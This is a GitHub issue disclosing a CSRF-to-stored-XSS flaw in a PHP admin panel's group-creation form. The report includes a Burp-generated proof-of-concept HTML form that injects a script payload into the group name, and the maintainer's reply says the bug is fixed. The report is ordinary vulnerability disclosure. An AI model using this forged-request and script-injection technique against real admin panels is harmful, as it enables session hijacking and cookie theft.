Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

from CSRF to stored XSS Stealing administrator cookies #7

Open
SZFsir opened this issue Oct 31, 2019 · 1 comment
Open

from CSRF to stored XSS Stealing administrator cookies #7

SZFsir opened this issue Oct 31, 2019 · 1 comment

Comments

@SZFsir
Copy link

SZFsir commented Oct 31, 2019

When adding a group
image

it has CSRF to add a group
image

The group's name could contain XSS payload. then it has stored XSS
image

CSRF poc

<html>
  <!-- CSRF PoC - generated by Burp Suite Professional -->
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="http://127.0.0.1/admin.php/system/config/addgroup.html" method="POST">
      <input type="hidden" name="name" value="qwer:<script>alert('hhhhhhhh')</script>" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>
@hisiphp
Copy link
Owner

hisiphp commented Oct 31, 2019

已修复,谢谢反馈

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
None yet
Projects
None yet
Development

No branches or pull requests

2 participants